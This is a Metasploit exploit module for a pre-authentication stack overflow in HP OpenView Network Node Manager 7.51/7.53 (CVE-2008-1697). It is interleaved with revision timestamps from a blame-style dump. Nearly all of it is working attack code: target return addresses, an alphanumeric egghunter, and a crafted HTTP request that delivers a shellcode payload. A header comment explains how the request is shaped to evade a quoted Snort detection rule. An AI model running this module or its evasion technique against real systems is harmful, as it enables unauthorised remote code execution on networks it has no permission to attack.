2009-12-15 00:32:42 +00:00
##
2010-04-30 08:40:19 +00:00
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
2009-12-15 00:32:42 +00:00
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# This should bypass the following snort rule referenced from web-misc.rules (10/17/2008)
# alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;)
# Newer versions of this rule might find this but we've taken steps to atleast bypass this rule
##
require 'msf/core'
class Metasploit3 < Msf :: Exploit :: Remote
Rank = GoodRanking
# =( need more targets and perhaps more OS specific return values OS specific would be preferred
include Msf :: Exploit :: Remote :: HttpClient
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
def initialize ( info = { } )
super ( update_info ( info ,
'Name' = > 'HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication SEH Overflow' ,
'Description' = > %q{
This module exploits a stack overflow in HP OpenView Network Node Manager versions 7 . 53 and earlier .
Specifically this vulnerability is caused by a failure to properly handle user supplied input within the
HTTP request including headers and the actual URL GET request .
Exploitation is tricky due to character restrictions . It was necessary to utilize a egghunter shellcode
which was alphanumeric encoded by muts in the original exploit .
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
If you plan on using exploit this for a remote shell , you will likely want to migrate to a different process
as soon as possible . Any connections get reset after a short period of time . This is probably some timeout
handling code that causes this .
} ,
'Author' = >
[
2010-04-30 08:40:19 +00:00
'bannedit' ,
2009-12-15 00:32:42 +00:00
# muts wrote the original exploit and did most of the initial work
# credit where credit is due. =)
'muts'
2010-04-30 08:40:19 +00:00
] ,
2009-12-15 00:32:42 +00:00
'Version' = > '$Revision$' ,
'References' = >
[
[ 'CVE' , '2008-1697' ] ,
[ 'OSVDB' , '43992' ] ,
[ 'BID' , '28569' ] ,
] ,
'DefaultOptions' = >
{
'WfsDelay' = > 45 ,
'EXITFUNC' = > 'thread' ,
2010-02-22 17:52:19 +00:00
'InitialAutoRunScript' = > 'migrate -f' ,
2009-12-15 00:32:42 +00:00
} ,
'Payload' = >
2010-04-30 08:40:19 +00:00
{
2009-12-15 00:32:42 +00:00
'Space' = > 1000 ,
'BadChars' = > " \x0a \x0d \x00 " ,
'StackAdjustment' = > - 3500 ,
} ,
'Platform' = > 'win' ,
'Privileged' = > true ,
'Targets' = >
[
# need more but this will likely cover most cases
[ 'Automatic Targeting' ,
{
'auto' = > true
}
] ,
2010-04-30 08:40:19 +00:00
[ 'Windows 2003/zip.dll OpenView 7.53' ,
2009-12-15 00:32:42 +00:00
{
'Ret' = > 0x6d633757 # pop pop ret
}
] ,
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
[ 'Windows 2000/jvm.dll OpenView NNM 7.51' ,
{
'Ret' = > 0x6d356c6e # pop pop ret
}
]
] ,
'DefaultTarget' = > 0 ,
'DisclosureDate' = > 'Apr 02 2008' ) )
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
register_options (
[
Opt :: RPORT ( 7510 ) ,
OptString . new ( 'UserAgent' , [ true , " The HTTP User-Agent sent in the request " , 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ] )
] , self . class )
end
2010-04-30 08:40:19 +00:00
def exploit
2009-12-15 00:32:42 +00:00
targ = target
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
if ( target [ 'auto' ] )
2009-12-26 03:31:20 +00:00
print_status ( " Detecting the remote version... " )
2009-12-21 23:10:38 +00:00
resp = send_request_raw ( { 'uri' = > '/topology/home' } , 5 )
2009-12-21 22:57:36 +00:00
if resp . nil?
print_status ( " No response to request " )
return Exploit :: CheckCode :: Safe
2009-12-15 00:32:42 +00:00
end
2009-12-21 22:57:36 +00:00
2009-12-15 00:32:42 +00:00
case resp . body
when / NNM Release B.07.53 /
targ = targets [ 1 ]
when / NNM Release B.07.51 /
targ = targets [ 2 ]
else
2009-12-21 22:57:36 +00:00
raise RuntimeError , " Unable to determine a target automatically... "
# if snmp is running you could set the target based on community strings
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
end
end
print_status ( " Using target: #{ targ . name } " )
2010-04-30 08:40:19 +00:00
exploit_target ( targ )
2009-12-15 00:32:42 +00:00
end
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
def exploit_target ( targ )
# we have to use an egghunter in this case because of the restrictions
# on the characters we can use.
# we are using skape's egghunter alpha numeric encoded by muts
2010-04-30 08:40:19 +00:00
egghunter =
2009-12-15 00:32:42 +00:00
'%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J' +
'MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5' +
'21*-q!au-q!au-oGSePAA%JMNU%521*-D' +
'A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1' +
'z1E-oRHEPAA%JMNU%521*-3s1--331--^' +
'TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA' +
'A%JMNU%521*-R222-1111-nZJ2PAA%JMN' +
'U%521*-1-wD-1-wD-8$GwP'
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
print_status ( " Constructing the malformed http request " )
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
buf = " http:// "
buf << " \xeb " * 1101 # this gets mangled in such a way we can use less input
buf << " \x41 " * 4 # sometimes less really is more
buf << " \x77 \x21 " # \xeb is restricted so we use a conditional jump which is always taken
buf << [ targ . ret ] . pack ( 'V' )
buf << " G " * 32
buf << egghunter
buf << " \x41 " * 100
buf << " : #{ datastore [ 'RPORT' ] } "
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
# T00W is the egg
payload_buf = " T00WT00W " + make_nops ( 34 ) + " \x83 \xc4 \x03 " + payload . encoded
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
begin
connect
resp = send_request_raw ( {
'uri' = > buf + " /topology/home " ,
'version' = > '1.1' ,
'method' = > 'GET' ,
'headers' = >
{
'Content-Type' = > 'application/x-www-form-urlencoded' ,
'User-Agent' = > datastore [ 'UserAgent' ] ,
} ,
'data' = > payload_buf
} )
2009-12-21 22:57:36 +00:00
rescue :: Rex :: ConnectionError , :: Errno :: ECONNRESET , :: Errno :: EINTR
2009-12-15 00:32:42 +00:00
# do nothing let the exploit live this catches the
# connection reset by peer error which is expected
end
2010-04-30 08:40:19 +00:00
2009-12-21 22:57:36 +00:00
if not resp . nil?
raise RuntimeError , " The server responded, that wasn't supposed to happen! "
end
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
print_status ( " Malformed http request sent. " )
print_status ( " Now we wait for the egg hunter to work it's magic. thx skape! " )
handler
2009-12-21 22:10:18 +00:00
disconnect
2009-12-15 00:32:42 +00:00
end
2010-04-30 08:40:19 +00:00
2009-12-15 00:32:42 +00:00
def check
2009-12-21 22:57:36 +00:00
2009-12-21 23:10:38 +00:00
resp = send_request_raw ( { 'uri' = > '/topology/home' } , 5 )
2009-12-21 22:57:36 +00:00
if resp . nil?
print_status ( " No response to request " )
2009-12-15 00:32:42 +00:00
return Exploit :: CheckCode :: Safe
end
2009-12-21 22:57:36 +00:00
if ( resp . body =~ / NNM Release B.07.53 / || resp . body =~ / NNM Release B.07.52 / || resp . body =~ / NNM Release B.07.51 / )
return Exploit :: CheckCode :: Appears
2009-12-15 00:32:42 +00:00
end
2009-12-21 22:57:36 +00:00
return Exploit :: CheckCode :: Safe
2009-12-15 00:32:42 +00:00
end
end